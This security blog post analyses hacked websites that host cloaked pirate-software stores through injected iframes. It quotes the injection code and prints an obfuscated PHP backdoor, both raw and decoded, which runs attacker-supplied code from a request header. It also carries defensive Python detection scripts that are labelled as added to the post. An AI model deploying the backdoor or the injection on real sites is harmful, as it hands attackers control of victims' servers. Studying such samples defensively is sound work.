Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Hackers Turn Legitimate Websites into Underground Software Stores

   10 Dec 10   Filed in Website exploits

This is the time of the year when online sellers do their best to attract herds of holiday shoppers. Software pirates are no different. They offer huge discounts (up to 95%) for popular and expensive software products and provide user-friendly online stores. They even made their sites one step closer to you!

I’ve already written about black hat SEO schemes that pirates use to drive traffic to their sites. They all involve compromising established legitimate sites and poisoning the first pages of Google’s search results with links to doorway pages on hacked sites, which redirect searchers further to illegal stores on servers controlled by criminals.

The doorway pages on legitimate websites are an important part of the scheme:

  • They are the pages that pirates promote in search engines
  • They take advantage of the established reputation of the hacked site, so they require less effort to reach high rankings
  • They channel search traffic to underground websites
  • They hide underground websites from search engines
  • They transparently redirect traffic to new sites when criminals change domain names of their resources.

Eliminating doorway pages

However, there is a new development in this area. Instead of placing just doorway pages on compromised sites, hackers now create whole online stores there.

Here’s how it works: the keyword-rich spammy web pages on hacked sites check whether a visitor comes from a search engine and inject a full-screen iframe at the very top of the web page. The iframe contains a familiar “software discounter” online store (identical to the ones I wrote about before).

[Screenshot: software discounter in an iframe]

Note the double scrollbars on the screenshot: one pair belongs to the iframe and the other to the entire web page. If you scroll down, you’ll see the normal content of that web page.

Not every visitor from search engines can see that iframe. If the search query includes a “site:” operator, the iframe won’t be injected into the landing pages. Probably the idea was to hide the shop from webmasters who use “site:” searches. However, the implementation of this idea is quite stupid: while the shop iframe is not visible, the spammy content on the landing page remains intact, so a webmaster will immediately be aware of the compromise.

Local store pages

Although iframes can load web pages from third-party sites, in this case they load the “shop” pages from the same site. Here is typical iframe code injected at the very bottom of a landing page:

<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y3Abo3Nip2IupzAbYm9mCJSlL2ucL2SxWzAjow02ZwD%3D&nd=Ym92pUW4CGRzpUW4CJ5IEGOjHJWcJGWeL3S6FTqjZwy6pIIkqKO6FTuirxxjJGAOLz8mGzyjZxy1pUcOLyygBJ1QFyAfGQW1L0jlH3uKrxSdo3pjZyc3EPHmEN%3D%3D"></iframe>

To make sure that styles and scripts on the hijacked web page don’t interfere with the shop iframe, hackers make the following change to the <body> tag:

<body style="margin:0px;padding:0px;width:100%;height:100%"><script>document.write('<noscript>');</script>

All images and style sheets are also loaded from the same domain, and they all have a similar URL structure. Something like this:


The indexed landing pages have URLs that also follow a specific pattern: or

This makes me think that the index files on these sites contain injected code that processes requests with specific parameters to generate spammy landing pages (?word=number) and “shop” web pages (?vprx=1&prx=….).
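To show how a webmaster can check a page for this kind of cloaked, same-site shop iframe, here is an added Python example; it is not code from this post or from the attackers’ kit. It works on two copies of the same page’s HTML, one fetched without a referrer and one fetched with a search-engine referrer, and reports iframes that appear only in the second copy, together with the tell-tale signs described above: a relative src carrying vprx/prx parameters, 100% width and height, the reset <body> style, and the document.write('<noscript>') trick. The two HTML snippets, the prx value and the function names are constructed for the example; fetching the page is left to the caller.

```python
"""Spot a cloaked, same-site shop iframe injected into a hacked page (added example)."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Query parameters the post observed on the injected shop iframes.
SHOP_PARAMS = {"vprx", "prx"}
# The <body> override hackers apply so the host page's CSS cannot shrink the iframe.
BODY_RESET = "margin:0px;padding:0px;width:100%;height:100%"
# Trick that hides the rest of the page from JavaScript-enabled browsers.
NOSCRIPT_TRICK = "document.write('<noscript>')"

# Constructed HTML for a fictitious hacked page: what a visitor without a
# search-engine referrer receives (spammy text, but no shop iframe) ...
PLAIN_HTML = """<html><head><title>Widgets Inc</title></head>
<body>
<h1>Welcome to Widgets Inc</h1>
<p>buy discount example software cheap oem download</p>
</body></html>"""

# ... and what a visitor arriving from a search engine receives (constructed).
REFERRED_HTML = """<html><head><title>Widgets Inc</title></head>
<body style="margin:0px;padding:0px;width:100%;height:100%"><script>document.write('<noscript>');</script>
<h1>Welcome to Widgets Inc</h1>
<p>buy discount example software cheap oem download</p>
<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&amp;prx=CONSTRUCTED_TOKEN&amp;nd=CONSTRUCTED"></iframe>
</body></html>"""


class _Collector(HTMLParser):
    """Collects iframe attributes and the <body> style attribute."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.body_style = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "body":
            self.body_style = attrs.get("style")


def describe_iframe(attrs):
    """Return the properties that make an iframe look like an injected shop."""
    src = attrs.get("src") or ""
    url = urlparse(src)
    query = parse_qs(url.query)
    return {
        "src": src,
        "same_site": url.netloc == "",  # relative URL: served by the hacked site itself
        "full_screen": attrs.get("width") == "100%" and attrs.get("height") == "100%",
        "shop_params": bool(SHOP_PARAMS.intersection(query)),
    }


def audit(html):
    """Summarise the injection indicators present in one copy of a page."""
    parser = _Collector()
    parser.feed(html)
    style = (parser.body_style or "").replace(" ", "")
    return {
        "iframes": [describe_iframe(a) for a in parser.iframes],
        "body_reset_style": BODY_RESET in style,
        "noscript_trick": NOSCRIPT_TRICK in html,
    }


def cloaked_iframes(plain_html, referred_html):
    """Iframes that show up only when the page believes a search engine sent the visitor."""
    seen = {f["src"] for f in audit(plain_html)["iframes"]}
    return [f for f in audit(referred_html)["iframes"] if f["src"] not in seen]


if __name__ == "__main__":
    for frame in cloaked_iframes(PLAIN_HTML, REFERRED_HTML):
        print("cloaked iframe:", frame)
    print("referred copy:", audit(REFERRED_HTML))
```

Because the check compares two fetches of the same URL, it also catches the “site:” exception the post mentions: if you fetch with a Google referrer whose query string contains site:, the iframe should be missing, which is itself a sign of cloaking.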

Here is a list of real landing pages on compromised sites.

Poisoned search results

These rogue sites do pretty well in search results:

[Screenshot: search results for buy Graphisoft ArchiCAD]
[Screenshot: search results for "buy discount Dragon NaturallySpeaking 10"]

On the latter screenshot, you can see that Google considers the rogue site on such a good match for the query (which returns 178,000 results) that it deserves 3 positions on the first page of search results plus the “+ show more results from” link.


Maybe it’s just a coincidence, but about 85% of the hacked sites with pirated software stores installed were found on different IPs on DreamHost networks:

  • 5 sites on – (United States Brea New Dream Network Llc)
  • 9 sites on – (United States Brea New Dream Network Llc)
  • 16 sites on – (United States Brea New Dream Network Llc)

Most of these sites are on shared servers, and when I check other sites on those servers I usually find a few more with spammy links and doorway pages.

This distribution of hacked sites makes me suspect that DreamHost servers are somehow attractive to hackers. Probably there is a way for attackers to hop from server to server and search for hackable sites.

The same black-hat SEO campaign

As far as I can see, the rogue software stores on hacked legitimate sites are basically the same as the ones on dedicated servers that I described both last week and a year ago. Their look and feel is the same, and on the final “checkout” step they redirect to the well-known “paym8” sites (e.g. payment8ltd .net/shop/order/ or 8payment. net/shop/order/).

I still don’t have enough information on how these shops work internally. I tried to contact the webmasters of compromised sites, but so far I have only received a couple of backdoor scripts. For example, this file called .php:

$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70 \x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1 FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');

which translates to something like this:

if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE'])) @eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));

(The preg_replace() call uses the “e” modifier, so PHP evaluates the replacement string as code, and the base64 string inside it decodes to the line above.) In other words, the script executes whatever PHP code arrives, reversed and base64-encoded, in a custom X-Code request header, but only for requests whose custom Quote header has the expected MD5 hash, so ordinary visitors and scanners never trigger it.
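The layers of that backdoor can be peeled mechanically. The following Python script is an added example (mine, not from the post or the attackers): it strips the spaces the post uses to break up the string, turns the \xNN escapes back into characters, recognises the preg_replace() call with the /e modifier, decodes the base64 payload and lists the $_SERVER variables the final code reads, which tells a defender which request headers to watch for in access logs. The SAMPLE constant is the obfuscated string quoted above, spaces included; the helper names are mine.

```python
"""Peel the layers of the hex-escaped preg_replace /e backdoor (added example)."""
import base64
import re

# The obfuscated string quoted in the post, spaces and all (the post breaks the
# string up with spaces; whitespace is stripped before decoding).
SAMPLE = r"""$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70 \x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1 FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');"""

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# First argument of a call: a pipe-delimited pattern whose modifiers include "e",
# i.e. the replacement string will be evaluated as PHP.
PREG_E = re.compile(r'\("\|[^"|]*\|[a-zA-Z]*e[a-zA-Z]*",')
# An eval(base64_decode("...")) style wrapper with a literal base64 payload.
B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
SERVER_VAR = re.compile(r"\$_SERVER\['([A-Z_]+)'\]")


def unescape_hex(src):
    """Turn PHP \\xNN escapes back into the characters they stand for."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)


def deobfuscate(src):
    """Return every layer, from the unescaped source down to the final PHP."""
    layers = [unescape_hex(re.sub(r"\s+", "", src))]
    while True:
        match = B64_CALL.search(layers[-1])
        if not match:  # no further base64 wrapper: this is the real payload
            break
        layers.append(base64.b64decode(match.group(1)).decode("utf-8", "replace"))
    return layers


def indicators(layers):
    """Facts a defender wants from the final layer: eval use and the headers it reads."""
    final = layers[-1]
    server_vars = sorted(set(SERVER_VAR.findall(final)))
    # PHP exposes a request header "X-Code" as $_SERVER['HTTP_X_CODE'].
    headers = [v[len("HTTP_"):].replace("_", "-").title()
               for v in server_vars if v.startswith("HTTP_")]
    return {
        "preg_replace_e": "preg_replace" in layers[0] and bool(PREG_E.search(layers[0])),
        "uses_eval": "eval(" in final,
        "server_vars": server_vars,
        "request_headers": headers,
    }


if __name__ == "__main__":
    found = deobfuscate(SAMPLE)
    for depth, layer in enumerate(found):
        print(f"--- layer {depth} ---\n{layer}")
    print(indicators(found))
```

The practical output is the request_headers list: requests carrying both a Quote and an X-Code header are the ones that would reach the eval, and they can be searched for in web server logs once those headers are logged.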

To webmasters

I guess it is clear that illegal online stores create serious problems for owners of compromised sites. Not only can they hurt search engine rankings for normal keywords and incur penalties, but they may also be a reason to remove your website from a server (most hosting ToS prohibit selling pirated software).

Please check my doorway/spammy links detection instructions that I posted last week; they are also useful for revealing any unwanted content on your site, including such rogue stores.

You should also regularly check access logs (not just Google Analytics, which only tracks visitors with JavaScript enabled) for suspicious requests; they may help you identify backdoor scripts, vulnerable files and rogue sections of your site. Pay special attention to POST requests.
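As an added example of the log check suggested here (not part of the original post), the Python script below parses access-log lines in the combined log format and flags the request shapes this post describes: ?word=number doorway URLs, ?vprx=1&prx=… shop URLs, search-engine visitors landing on doorway URLs, and POST requests to PHP files outside a short allowlist. The log lines, addresses, paths and the allowlist are constructed for the example, and the function names are mine.

```python
"""Flag access-log requests that match the hacked-site patterns in the post (added example)."""
import re

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

SHOP_QUERY = re.compile(r"[?&](vprx|prx)=")      # shop page: /?vprx=1&prx=...
DOORWAY_QUERY = re.compile(r"^/\?[a-z]+=\d+$")   # doorway page: /?word=number
SEARCH_ENGINE = re.compile(r"^https?://(www\.)?(google|bing|yahoo)\.")
# Constructed allowlist: scripts on this site that legitimately receive POSTs.
KNOWN_POST_TARGETS = {"/contact.php"}

# Constructed sample lines (addresses, paths and times are invented).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2010:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2010:10:02:11 +0000] "GET /?archicad=4127 HTTP/1.1" 200 9001 "http://www.google.com/search?q=buy+archicad" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2010:10:02:12 +0000] "GET /?vprx=1&prx=CONSTRUCTED HTTP/1.1" 200 30010 "http://www.example.org/?archicad=4127" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2010:10:05:40 +0000] "POST /images/cache.php HTTP/1.1" 200 12 "-" "Python-urllib/2.6"
203.0.113.8 - - [10/Dec/2010:10:06:00 +0000] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.org/contact.php" "Mozilla/5.0"
"""


def parse_log(text):
    """Yield one dict per well-formed combined-format line."""
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            yield match.groupdict()


def reasons(entry):
    """Why a single request looks suspicious; an empty list when it does not."""
    path, found = entry["path"], []
    if SHOP_QUERY.search(path):
        found.append("shop iframe query (vprx/prx)")
    if DOORWAY_QUERY.match(path):
        found.append("doorway-style ?word=number URL")
        if SEARCH_ENGINE.match(entry["referer"]):
            found.append("search-engine visitor landed on the doorway")
    if entry["method"] == "POST" and path.endswith(".php") and path not in KNOWN_POST_TARGETS:
        found.append("POST to a PHP file that should not accept POSTs (possible backdoor)")
    return found


def suspicious_requests(text):
    """Return (ip, method, path, reasons) for every flagged line, in log order."""
    flagged = []
    for entry in parse_log(text):
        why = reasons(entry)
        if why:
            flagged.append((entry["ip"], entry["method"], entry["path"], why))
    return flagged


if __name__ == "__main__":
    for ip, method, path, why in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {method} {path}: {'; '.join(why)}")
```

The POST allowlist is the part to adapt to your site: any PHP file that receives POSTs but is not a form handler you know about deserves a look, and a POST from a scripted user agent to a file in an images or uploads directory is the classic backdoor footprint.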

Make sure that your files and directories are not world-writable. Leaving anything where your server neighbors can write to is an invitation to abuse your site.

Finally, if you find one of such shops on your site, you should contact the pirates (they provide a toll-free contact phone number +1-866-576-8741) and ask for your share in sales (don’t agree on less than 50%).

As always, I’m interested in any internal information about this sort of hacks. If you are a webmaster of a hacked site, or a representative of a hosting provider, please share your findings here in comments, or, if you don’t want to publicly disclose any sensitive information, you can contact me directly. Thanks.


Reader's Comments (2)

  1.

    […] This post was mentioned on Twitter by John Mueller and Denis, PhysicalDrive0. PhysicalDrive0 said: RT @unmaskparasites: [blog] Hackers Turn Legitimate Websites into Underground Software Stores – doorways are not enough […]

  2.

    If you look at the site similar to the one mentioned above ( do a reverse DNS lookup, you will see it is hosted in Hong Kong, including the Secure Payment Site.

    They claim to be in Georgia.

    So, it’s always a good idea to do this on any site you are unsure of. It is no guarantee but at least you can see if they are where they say they are.

    I used this site to do the lookup (I am not associated with this site)